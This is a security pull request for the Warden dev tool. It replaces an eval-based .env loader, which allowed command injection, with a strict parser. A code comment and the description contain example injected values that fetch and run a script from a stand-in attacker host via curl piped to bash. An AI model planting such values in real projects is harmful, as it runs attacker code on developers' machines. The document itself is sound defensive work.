### PR TITLE
security: stop evaluating project .env values as shell code

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,9 @@
 **Big Changes:**
 * Traefik has been updated from v2 to v3.  For compatibility, we have kept the v2 rule engine as the default.  It is possible to opt-in to v3 rule syntax on a per-router basis.
 
+**Security Fixes:**
+* Fix arbitrary command execution via project `.env` files. The previous loader used `eval "$(grep ...)"` against any project's `.env`, allowing shell metacharacters (e.g. `$(...)` or backticks) inside `WARDEN_*`, `TRAEFIK_*` or `PHP_*` values to execute on the developer's host whenever `warden env *` was run. Replaced with a strict KEY=VALUE parser that validates identifiers and never evaluates values. (by @lbajsarowicz)
+
 **Bug Fixes:**
 * Add support to dynamically connect peered services based on enabled status ([#892](https://github.com/wardenenv/warden/issues/892) by @bap14, [#919](https://github.com/wardenenv/warden/issues/919) by @xinsodev)
 * Fix WARDEN_DOCKER_SOCK error running `warden sign-certificate` ([#907](https://github.com/wardenenv/warden/issues/907) by @bap14)

--- a/utils/env.sh
+++ b/utils/env.sh
@@ -31,11 +31,45 @@ function locateEnvPath () {
     echo "${WARDEN_ENV_PATH}"
 }
 
+## Safely load whitelisted KEY=VALUE pairs from a dotenv-style file.
+## Replaces previous `eval "$(grep ...)"` pattern that allowed arbitrary
+## command execution if a project's .env contained shell metacharacters
+## (e.g. `WARDEN_FOO=$(curl evil.sh|bash)`), which is RCE on `warden env *`.
+function loadEnvFile () {
+    local envFile="${1}"
+    local prefixRegex="${2}"
+    [[ ! -f "${envFile}" ]] && return 0
+
+    local line key value
+    while IFS= read -r line || [[ -n "${line}" ]]; do
+        line="${line%$'\r'}"
+        [[ -z "${line}" ]] && continue
+        [[ "${line}" =~ ^[[:space:]]*# ]] && continue
+        [[ "${line}" != *=* ]] && continue
+
+        key="${line%%=*}"
+        value="${line#*=}"
+
+        # Reject anything that is not a POSIX shell identifier (must start with
+        # letter or underscore), and require it to match the requested prefix.
+        [[ ! "${key}" =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] && continue
+        [[ ! "${key}" =~ ^${prefixRegex} ]] && continue
+
+        # Strip surrounding single or double quotes — but never expand contents.
+        if [[ "${value}" =~ ^\"(.*)\"$ ]] || [[ "${value}" =~ ^\'(.*)\'$ ]]; then
+            value="${BASH_REMATCH[1]}"
+        fi
+
+        printf -v "${key}" '%s' "${value}"
+        export "${key?}"
+    done < "${envFile}"
+}
+
 function loadEnvConfig () {
     local WARDEN_ENV_PATH="${1}"
-    eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^WARDEN_")"
-    eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^TRAEFIK_")"
-    eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^PHP_")"
+    loadEnvFile "${WARDEN_ENV_PATH}/.env" "WARDEN_"
+    loadEnvFile "${WARDEN_ENV_PATH}/.env" "TRAEFIK_"
+    loadEnvFile "${WARDEN_ENV_PATH}/.env" "PHP_"
 
     WARDEN_ENV_NAME="${WARDEN_ENV_NAME:-}"
     WARDEN_ENV_TYPE="${WARDEN_ENV_TYPE:-}"
@@ -55,7 +89,7 @@ function loadEnvConfig () {
 
     # Load mutagen settings if available
     if [[ -f "${WARDEN_HOME_DIR}/.env" ]]; then
-      eval "$(sed 's/\r$//g' < "${WARDEN_HOME_DIR}/.env" | grep "^WARDEN_MUTAGEN_ENABLE")"
+      loadEnvFile "${WARDEN_HOME_DIR}/.env" "WARDEN_MUTAGEN_ENABLE"
     fi
 
     ## configure mutagen enable by default for MacOs


### PR DESCRIPTION
## Summary

`utils/env.sh::loadEnvConfig` previously loaded project configuration with:

```bash
eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^WARDEN_")"
eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^TRAEFIK_")"
eval "$(cat "${WARDEN_ENV_PATH}/.env" | sed 's/\r$//g' | grep "^PHP_")"
```

Any shell metacharacters inside a project `.env` are therefore executed on the developer's host whenever `warden env *`, `warden sync *`, or any other env-loading command runs.

### Impact

Cloning a malicious Magento / Drupal / Laravel project that ships e.g.

```
WARDEN_ENV_NAME=demo
WARDEN_ENV_TYPE=magento2
WARDEN_PWN=$(curl -s http://attacker.example/x.sh | bash)
```

results in RCE on the developer's machine on the first `warden env up` — before any container is built or started. Magento ecosystem developers regularly clone third-party stores / extensions / forks for review, so the attack surface is wider than a single team's repos.

There is also a related usability bug: because `eval` is used, any value that contains characters with shell meaning (`;`, unquoted globs, etc.) is interpreted instead of stored verbatim — for example `WARDEN_SYNC_IGNORE=.DS_Store;node_modules;*~` is tokenised into three separate shell commands and produces `command not found` errors.

### Fix

Replaced the eval-based loader with a small `loadEnvFile` helper that:

* reads the file line by line (no `eval`, no `source`),
* skips blank/comment lines and lines without `=`,
* requires the key to match `^[A-Za-z_][A-Za-z0-9_]*$` (POSIX shell identifier),
* requires the key to match the requested prefix (`WARDEN_` / `TRAEFIK_` / `PHP_` / `WARDEN_MUTAGEN_ENABLE`),
* strips surrounding single or double quotes from the value but never expands its contents,
* exports via `printf -v "${key}" '%s' "${value}"; export "${key}"` — value is stored as a literal string.

Tested with a crafted `.env` containing `WARDEN_PWN=$(touch /tmp/PWNED)`, `EVIL_OUTSIDE_PREFIX=$(...)`, comment lines, invalid identifiers (`3BAD=`), and quoted list values — none of the command substitutions are evaluated and the legitimate values are read correctly.

## Test plan

- [ ] Existing `warden env init` / `warden env up` flows still load `.env` values for all environment types (magento2, magento1, drupal, laravel, cakephp, generic).
- [ ] `WARDEN_MUTAGEN_ENABLE` from `${WARDEN_HOME_DIR}/.env` continues to be honored.
- [ ] Values with previously-problematic characters (commas, glob patterns) in `WARDEN_SYNC_IGNORE` are now stored verbatim.
- [ ] Confirm a crafted `WARDEN_X=$(touch /tmp/proof)` no longer creates `/tmp/proof`.